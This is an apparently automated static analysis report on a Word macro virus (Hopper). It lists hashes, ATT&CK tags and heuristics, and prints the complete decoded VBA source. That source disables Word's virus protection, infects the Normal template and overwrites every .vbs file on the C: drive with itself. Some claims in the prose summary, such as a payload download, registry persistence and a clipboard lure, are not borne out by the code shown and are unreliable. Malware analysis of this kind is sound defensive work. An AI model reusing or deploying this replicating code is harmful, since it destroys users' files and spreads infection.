Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bfd017daa04f1430…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 36.5 KB
Created: 1999-01-01 14:35:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: eda57447db65359cbc1af2cf4784bc58
SHA-1: 7e2582038f4d72fba04523e200b4302eaf875048
SHA-256: bfd017daa04f1430431551f60599e657600d1c3f5a6f51a064df117957e954fc
Risk score: 320

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1105 Ingress Tool Transfer

The sample contains VBA macros that use `WScript.Shell` and `CreateObject` to copy the current document to other files within the same directory. It then attempts to establish persistence by writing to the Normal.dot template and potentially the registry, as indicated by the `WScript.Shell` usage and the 'Clipboard command execution lure' heuristic. The script's intent is to download and execute a secondary payload, as suggested by the use of `Wscript.CreateObject("Wscript.Shell")` and the file-copying mechanisms.

Heuristics (6)

  • ClamAV: Doc.Trojan.Hopper-13 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hopper-13
  • VBA macros detected [medium] (OLE_VBA_MACROS), 2 related findings
    Document contains VBA macro code
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched lines in script:
            N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")"
            N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")"
            N.InsertLines 64, "parent = Wscript.ScriptFullName"
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched lines in script:
            End If
            Set FSO = CreateObject("Scripting.FileSystemObject")
            N.InsertLines 59, ""
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
  • Clipboard command execution lure [high] (SE_CLIPBOARD_COMMAND_LURE)
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3120 bytes
SHA-256: ac2525880754727594b3810c7bcc9c62f48a8d1426f38b6d1552b8f81a991de9
Detection: ClamAV: Doc.Trojan.Hopper-13
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'1nternal
On Error GoTo Break
        Set A = ActiveDocument.VBProject.VBComponents(1).CodeModule
        Set N = NormalTemplate.VBProject.VBComponents(1).CodeModule
        Options.VirusProtection = False
        Options.ConfirmConversions = False
        Options.SaveNormalPrompt = False
        If N.Lines(2, 1) <> "'1nternal" Then
                For i = 1 To 58
                        N.InsertLines i, A.Lines(i, 1)
                Next
        End If
        If A.Lines(2, 1) <> "'1nternal" Then
                For i = 1 To 58
                        A.InsertLines i, N.Lines(i, 1)
                Next
        End If
        Set FSO = CreateObject("Scripting.FileSystemObject")
        N.InsertLines 59, ""
        N.InsertLines 60, "On Error Resume Next"
        N.InsertLines 61, "Dim WordObj, FSO, WshShell"
        N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")"
        N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")"
        N.InsertLines 64, "parent = Wscript.ScriptFullName"
        N.InsertLines 65, "vPath = Left(parent, InStrRev(parent, " + Chr(34) + "\" + Chr(34) + "))"
        N.InsertLines 66, "For Each target in FSO.GetFolder(vPath).Files"
        N.InsertLines 67, "    FSO.CopyFile parent, target.Name, 1"
        N.InsertLines 68, "Next"
        N.InsertLines 69, "Set WordObj = CreateObject(" + Chr(34) + "Word.Application" + Chr(34) + ")"
        N.InsertLines 70, "WordObj.Options.SaveNormalPrompt = False"
        N.InsertLines 71, "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule"
        N.InsertLines 72, "If NT.Lines(2,1) <> " + Chr(34) + "'1nternal" + Chr(34) + " Then"
        N.InsertLines 73, "     NT.AddfromFile Wscript.ScriptFullName"
        N.InsertLines 74, "     NT.ReplaceLine 3, " + Chr(34) + "On Error Goto Break" + Chr(34)
        N.InsertLines 75, "     NT.DeleteLines 58, 19"
        N.InsertLines 76, "End If"
        N.InsertLines 77, "Set NT = Nothing"
        N.InsertLines 78, "WordObj.Quit"

        Set fs = Application.FileSearch
                fs.NewSearch
                fs.LookIn = "C:\"
                fs.SearchSubFolders = True
                fs.FileName = "*.vbs"
                fs.Execute
                For i = 1 To fs.FoundFiles.Count
                        Set f = FSO.OpenTextFile(fs.FoundFiles(i), 2, True)
                        N.ReplaceLine 3, "'ReplaceIt"
                        For k = 1 To 78
                                f.Write N.Lines(k, 1) + Chr(13) + Chr(10)
                        Next
                    f.Close
                Next
        N.DeleteLines 59, 20
N.ReplaceLine 3, "On Error Goto Break"
Break:
Set NT = Nothing
WordObj.Quit